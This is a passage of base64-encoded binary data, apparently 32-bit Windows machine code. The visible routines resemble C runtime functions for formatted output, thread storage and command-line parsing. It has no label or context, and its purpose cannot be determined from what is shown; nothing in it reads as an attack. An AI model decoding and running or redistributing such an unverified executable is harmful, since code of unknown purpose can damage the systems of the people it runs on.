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tdFFaLdQxX/3UQM/+Njaj7//+JhdD7//+JneT7//+Jvbj7//+Jvfj7//+JvdT7//+JvfT7//+Jvdz7//+JvcT7//+Jvdj7///oldr//zm90Pv//3Uz6Ojm//9XV1dXxwAWAAAAV+hw5v//g8QUgL20+///AHQKi4Ww+///g2Bw/YPI/+nECgAAO/d0yQ+3FjPJib3g+///ib3s+///ib28+///iZXo+///ZjvXD4SBCgAAagJfA/eDveD7//8AibXA+///D4xpCgAAjULgZoP4WHcPD7fCD76AQBQBEIPgD+sCM8APvoTBYBQBEGoHwfgEWYmFpPv//zvBD4f1CQAA/ySF8G8AEDPAg430+////4mFoPv//4mFxPv//4mF1Pv//4mF3Pv//4mF+Pv//4mF2Pv//+m8CQAAD7fCg+ggdEqD6AN0NoPoCHQlK8d0FYPoAw+FnQkAAION+Pv//wjpkQkAAION+Pv//wTphQkAAION+Pv//wHpeQkAAIGN+Pv//4AAAADpagkAAAm9+Pv//+lfCQAAZoP6KnUsg8MEiZ3k+///i1v8iZ3U+///hdsPjT8JAACDjfj7//8E953U+///6S0JAACLhdT7//9rwAoPt8qNRAjQiYXU+///6RIJAACDpfT7//8A6QYJAABmg/oqdSaDwwSJneT7//+LW/yJnfT7//+F2w+N5ggAAION9Pv////p2ggAAIuF9Pv//2vACg+3yo1ECNCJhfT7///pvwgAAA+3woP4SXRXg/hodEaD+Gx0GIP4dw+FpAgAAIGN+Pv//wAIAADplQgAAGaDPmx1FwP3gY34+///ABAAAIm1wPv//+l4CAAAg434+///EOlsCAAAg434+///IOlgCAAAD7cGZoP4NnUfZoN+AjR1GIPGBIGN+Pv//wCAAACJtcD7///pOAgAAGaD+DN1H2aDfgIydRiDxgSBpfj7////f///ibXA+///6RMIAABmg/hkD4QJCAAAZoP4aQ+E/wcAAGaD+G8PhPUHAABmg/h1D4TrBwAAZoP4eA+E4QcAAGaD+FgPhNcHAACDpaT7//8Ai4XQ+///Uo214Pv//8eF2Pv//wEAAADo+/v//+muBwAAD7fCg/hkD48vAgAAD4TAAgAAg/hTD48bAQAAdH6D6EF0ECvHdFkrx3QIK8cPhe8FAACDwiDHhaD7//8BAAAAiZXo+///g434+///QIO99Pv//wCNtfz7//+4AAIAAIm18Pv//4mF7Pv//w+NkAIAAMeF9Pv//wYAAADp7AIAAPeF+Pv//zAIAAAPhcgAAACDjfj7//8g6bwAAAD3hfj7//8wCAAAdQeDjfj7//8gi730+///g///dQW/////f4PDBPaF+Pv//yCJneT7//+LW/yJnfD7//8PhAgFAACF23ULoSBdARCJhfD7//+Dpez7//8Ai7Xw+///hf8PjiAFAACKBoTAD4QWBQAAjY2o+///D7bAUVDoCNf//1lZhcB0AUZG/4Xs+///Ob3s+///fNDp6wQAAIPoWA+E9wIAACvHD4SUAAAAK8EPhPb+//8rxw+FygQAAA+3A4PDBDP2RvaF+Pv//yCJtdj7//+JneT7//+JhZz7//90QoiFzPv//42FqPv//1CLhaj7///Ghc37//8A/7CsAAAAjYXM+///UI2F/Pv//1DoR1AAAIPEEIXAfQ+JtcT7///rB2aJhfz7//+Nhfz7//+JhfD7//+Jtez7///pRgQAAIsDg8MEiZ3k+///hcB0OotIBIXJdDP3hfj7//8ACAAAD78AiY3w+///dBKZK8LHhdj7//8BAAAA6QEEAACDpdj7//8A6fcDAAChIF0BEImF8Pv//1DokzEAAFnp4AMAAIP4cA+P+gEAAA+E4gEAAIP4ZQ+MzgMAAIP4Zw+O6f3//4P4aXRxg/hudCiD+G8PhbIDAAD2hfj7//+Ax4Xo+///CAAAAHRhgY34+///AAIAAOtVizODwwSJneT7///oQU8AAIXAD4QwBQAA9oX4+///IHQMZouF4Pv//2aJBusIi4Xg+///iQbHhcT7//8BAAAA6cEEAACDjfj7//9Ax4Xo+///CgAAAPeF+Pv//wCAAAAPhKsBAACLA4tTBIPDCOnnAQAAdRJmg/pndWPHhfT7//8BAAAA61c5hfT7//9+BomF9Pv//4G99Pv//6MAAAB+PYu99Pv//4HHXQEAAFfomBAAAIuV6Pv//1mJhbz7//+FwHQQiYXw+///ib3s+///i/DrCseF9Pv//6MAAACLA4PDCImFlPv//4tD/ImFmPv//42FqPv//1D/taD7//8PvsL/tfT7//+JneT7//9Q/7Xs+///jYWU+///VlD/NUBdARDoTfD//1n/0Iud+Pv//4PEHIHjgAAAAHQhg730+///AHUYjYWo+///UFb/NUxdARDoHfD//1n/0FlZZoO96Pv//2d1HIXbdRiNhaj7//9QVv81SF0BEOj37///Wf/QWVmAPi11EYGN+Pv//wABAABGibXw+///VukE/v//x4X0+///CAAAAImNuPv//+skg+hzD4Rn/P//K8cPhIr+//+D6AMPhckBAADHhbj7//8nAAAA9oX4+///gMeF6Pv//xAAAAAPhGr+//9qMFhmiYXI+///i4W4+///g8BRZomFyvv//4m93Pv//+lF/v//94X4+///ABAAAA+FRf7//4PDBPaF+Pv//yB0HPaF+Pv//0CJneT7//90Bg+/Q/zrBA+3Q/yZ6xf2hfj7//9Ai0P8dAOZ6wIz0omd5Pv///aF+Pv//0B0G4XSfxd8BIXAcxH32IPSAPfagY34+///AAEAAPeF+Pv//wCQAACL2ov4dQIz24O99Pv//wB9DMeF9Pv//wEAAADrGoOl+Pv///e4AAIAADmF9Pv//34GiYX0+///i8cLw3UGIYXc+///jbX7/f//i4X0+////430+///hcB/BovHC8N0LYuF6Pv//5lSUFNX6J5NAACDwTCD+TmJnZD7//+L+IvafgYDjbj7//+IDk7rvY2F+/3//yvGRveF+Pv//wACAACJhez7//+JtfD7//90WYXAdAeLzoA5MHRO/43w+///i43w+///xgEwQOs2hdt1C6EkXQEQiYXw+///i4Xw+///x4XY+///AQAAAOsJT2aDOAB0BkBAhf918yuF8Pv//9H4iYXs+///g73E+///AA+FZQEAAIuF+Pv//6hAdCupAAEAAHQEai3rDqgBdARqK+sGqAJ0FGogWGaJhcj7///Hhdz7//8BAAAAi53U+///i7Xs+///K94rndz7///2hfj7//8MdRf/tdD7//+NheD7//9TaiDokfX//4PEDP+13Pv//4u90Pv//42F4Pv//42NyPv//+iY9f//9oX4+///CFl0G/aF+Pv//wR1EldTajCNheD7///oT/X//4PEDIO92Pv//wB1dYX2fnGLvfD7//+Jtej7////jej7//+Nhaj7//9Qi4Wo+////7CsAAAAjYWc+///V1Do3UoAAIPEEImFkPv//4XAfin/tZz7//+LhdD7//+NteD7///ouvT//wO9kPv//4O96Pv//wBZf6brHION4Pv////rE4uN8Pv//1aNheD7///o4/T//1mDveD7//8AfCD2hfj7//8EdBf/tdD7//+NheD7//9TaiDolfT//4PEDIO9vPv//wB0E/+1vPv//+hB1v//g6W8+///AFmLtcD7//8PtwaJhej7//9mhcB0KouNpPv//4ud5Pv//4vQ6Zb1///oIdz//8cAFgAAADPAUFBQUFDpMvX//4C9tPv//wB0CouFsPv//4NgcP2LheD7//+LTfxfXjPNW+hpzf//ycONSQC3ZwAQmWUAEMtlABAoZgAQdWYAEIFmABDIZgAQ2GcAEIv/VYvsgex0BAAAoRxQARAzxYlF/FOLXRRWi3UIM8BX/3UQi30MjY20+///ibXE+///iZ3o+///iYWs+///iYX4+///iYXU+///iYX0+///iYXc+///iYWw+///iYXY+///6P3O//+F9nU16FTb///HABYAAAAzwFBQUFBQ6Nra//+DxBSAvcD7//8AdAqLhbz7//+DYHD9g8j/6c8KAAAz9jv+dRLoGdv//1ZWVlbHABYAAABW68UPtw+JteD7//+Jtez7//+Jtcz7//+Jtaj7//+JjeT7//9mO84PhHQKAABqAloD+jm14Pv//4m9oPv//w+MSAoAAI1B4GaD+Fh3Dw+3wQ+2gKAUARCD4A/rAjPAi7XM+///a8AJD7aEMMAUARBqCMHoBF6Jhcz7//87xg+EM////4P4Bw+H3QkAAP8khZB7ABAzwION9Pv///+JhaT7//+JhbD7//+JhdT7//+Jhdz7//+Jhfj7//+Jhdj7///psAkAAA+3wYPoIHRIg+gDdDQrxnQkK8J0FIPoAw+FhgkAAAm1+Pv//+mHCQAAg434+///BOl7CQAAg434+///AelvCQAAgY34+///gAAAAOlgCQAACZX4+///6VUJAABmg/kqdSuLA4PDBImd6Pv//4mF1Pv//4XAD402CQAAg434+///BPed1Pv//+kkCQAAi4XU+///a8AKD7fJjUQI0ImF1Pv//+kJCQAAg6X0+///AOn9CAAAZoP5KnUliwODwwSJnej7//+JhfT7//+FwA+N3ggAAION9Pv////p0ggAAIuF9Pv//2vACg+3yY1ECNCJhfT7///ptwgAAA+3wYP4SXRRg/hodECD+Gx0GIP4dw+FnAgAAIGN+Pv//wAIAADpjQgAAGaDP2x1EQP6gY34+///ABAAAOl2CAAAg434+///EOlqCAAAg434+///IOleCAAAD7cHZoP4NnUZZoN/AjR1EoPHBIGN+Pv//wCAAADpPAgAAGaD+DN1GWaDfwIydRKDxwSBpfj7////f///6R0IAABmg/hkD4QTCAAAZoP4aQ+ECQgAAGaD+G8PhP8HAABmg/h1D4T1BwAAZoP4eA+E6wcAAGaD+FgPhOEHAACDpcz7//8Ai4XE+///UY214Pv//8eF2Pv//wEAAADoUvD//1npuAcAAA+3wYP4ZA+PMAIAAA+EvQIAAIP4Uw+PGwEAAHR+g+hBdBArwnRZK8J0CCvCD4XsBQAAg8Egx4Wk+///AQAAAImN5Pv//4ON+Pv//0CDvfT7//8AjbX8+///uAACAACJtfD7//+Jhez7//8PjY0CAADHhfT7//8GAAAA6ekCAAD3hfj7//8wCAAAD4XJAAAAg434+///IOm9AAAA94X4+///MAgAAHUHg434+///IIu99Pv//4P//3UFv////3+DwwT2hfj7//8giZ3o+///i1v8iZ3w+///D4QFBQAAhdt1C6EgXQEQiYXw+///g6Xs+///AIu18Pv//4X/D44dBQAAigaEwA+EEwUAAI2NtPv//w+2wFFQ6F7L//9ZWYXAdAFGRv+F7Pv//zm97Pv//3zQ6egEAACD6FgPhPACAAArwg+ElQAAAIPoBw+E9f7//yvCD4XGBAAAD7cDg8MEM/ZG9oX4+///IIm12Pv//4md6Pv//4mFnPv//3RCiIXI+///jYW0+///UIuFtPv//8aFyfv//wD/sKwAAACNhcj7//9QjYX8+///UOicRAAAg8QQhcB9D4m1sPv//+sHZomF/Pv//42F/Pv//4mF8Pv//4m17Pv//+lCBAAAiwODwwSJnej7//+FwHQ6i0gEhcl0M/eF+Pv//wAIAAAPvwCJjfD7//90EpkrwseF2Pv//wEAAADp/QMAAIOl2Pv//wDp8wMAAKEgXQEQiYXw+///UOjoJQAAWencAwAAg/hwD4/2AQAAD4TeAQAAg/hlD4zKAwAAg/hnD47o/f//g/hpdG2D+G50JIP4bw+FrgMAAPaF+Pv//4CJteT7//90YYGN+Pv//wACAADrVYszg8MEiZ3o+///6JpDAACFwA+EVvr///aF+Pv//yB0DGaLheD7//9miQbrCIuF4Pv//4kGx4Ww+///AQAAAOnBBAAAg434+///QMeF5Pv//woAAAD3hfj7//8AgAAAD4SrAQAAA96LQ/iLU/zp5wEAAHUSZoP5Z3Vjx4X0+///AQAAAOtXOYX0+///fgaJhfT7//+BvfT7//+jAAAAfj2LvfT7//+Bx10BAABX6PEEAABZi43k+///iYWo+///hcB0EImF8Pv//4m97Pv//4vw6wrHhfT7//+jAAAAiwODwwiJhZT7//+LQ/yJhZj7//+NhbT7//9Q/7Wk+///D77B/7X0+///iZ3o+///UP+17Pv//42FlPv//1ZQ/zVAXQEQ6Kbk//9Z/9CLnfj7//+DxByB44AAAAB0IYO99Pv//wB1GI2FtPv//1BW/zVMXQEQ6Hbk//9Z/9BZWWaDveT7//9ndRyF23UYjYW0+///UFb/NUhdARDoUOT//1n/0FlZgD4tdRGBjfj7//8AAQAARom18Pv//1bpCP7//4m19Pv//8eFrPv//wcAAADrJIPocw+Eavz//yvCD4SK/v//g+gDD4XJAQAAx4Ws+///JwAAAPaF+Pv//4DHheT7//8QAAAAD4Rq/v//ajBYZomF0Pv//4uFrPv//4PAUWaJhdL7//+Jldz7///pRf7///eF+Pv//wAQAAAPhUX+//+DwwT2hfj7//8gdBz2hfj7//9AiZ3o+///dAYPv0P86wQPt0P8mesX9oX4+///QItD/HQDmesCM9KJnej7///2hfj7//9AdBuF0n8XfASFwHMR99iD0gD32oGN+Pv//wABAAD3hfj7//8AkAAAi9qL+HUCM9uDvfT7//8AfQzHhfT7//8BAAAA6xqDpfj7///3uAACAAA5hfT7//9+BomF9Pv//4vHC8N1BiGF3Pv//421+/3//4uF9Pv///+N9Pv//4XAfwaLxwvDdC2LheT7//+ZUlBTV+j3QQAAg8Ewg/k5iZ2Q+///i/iL2n4GA42s+///iA5O672Nhfv9//8rxkb3hfj7//8AAgAAiYXs+///ibXw+///dFmFwHQHi86AOTB0Tv+N8Pv//4uN8Pv//8YBMEDrNoXbdQuhJF0BEImF8Pv//4uF8Pv//8eF2Pv//wEAAADrCU9mgzgAdAYDwoX/dfMrhfD7///R+ImF7Pv//4O9sPv//wAPhWUBAACLhfj7//+oQHQrqQABAAB0BGot6w6oAXQEaivrBqgCdBRqIFhmiYXQ+///x4Xc+///AQAAAIud1Pv//4u17Pv//yveK53c+///9oX4+///DHUX/7XE+///jYXg+///U2og6Orp//+DxAz/tdz7//+LvcT7//+NheD7//+NjdD7///o8en///aF+Pv//whZdBv2hfj7//8EdRJXU2owjYXg+///6Kjp//+DxAyDvdj7//8AdXWF9n5xi73w+///ibXk+////43k+///jYW0+///UIuFtPv///+wrAAAAI2FnPv//1dQ6DY/AACDxBCJhZD7//+FwH4p/7Wc+///i4XE+///jbXg+///6BPp//8DvZD7//+DveT7//8AWX+m6xyDjeD7////6xOLjfD7//9WjYXg+///6Dzp//9Zg73g+///AHwg9oX4+///BHQX/7XE+///jYXg+///U2og6O7o//+DxAyDvaj7//8AdBP/taj7///omsr//4OlqPv//wBZi72g+///i53o+///D7cHM/aJheT7//9mO8Z0B4vI6aH1//85tcz7//90DYO9zPv//wcPhVD1//+AvcD7//8AdAqLhbz7//+DYHD9i4Xg+///i038X14zzVvoyMH//8nDi/9gcwAQWHEAEIpxABDlcQAQMXIAED1yABCDcgAQgnMAEIv/VYvsVlcz9v91COi5IAAAi/hZhf91JzkFaGMBEHYfVv8VsAABEI2G6AMAADsFaGMBEHYDg8j/i/CD+P91yovHX15dw4v/VYvsVlcz9moA/3UM/3UI6Io/AACL+IPEDIX/dSc5BWhjARB2H1b/FbAAARCNhugDAAA7BWhjARB2A4PI/4vwg/j/dcOLx19eXcOL/1WL7FZXM/b/dQz/dQjoXkAAAIv4WVmF/3UsOUUMdCc5BWhjARB2H1b/FbAAARCNhugDAAA7BWhjARB2A4PI/4vwg/j/dcGLx19eXcOL/1WL7Fe/6AMAAFf/FbAAARD/dQj/FZQAARCBx+gDAACB/2DqAAB3BIXAdN5fXcOL/1WL7OiwQwAA/3UI6P1BAAD/NRBYARDo/t7//2j/AAAA/9CDxAxdw4v/VYvsaBwDARD/FZQAARCFwHQVaAwDARBQ/xWYAAEQhcB0Bf91CP/QXcOL/1WL7P91COjI////Wf91CP8VtAABEMxqCO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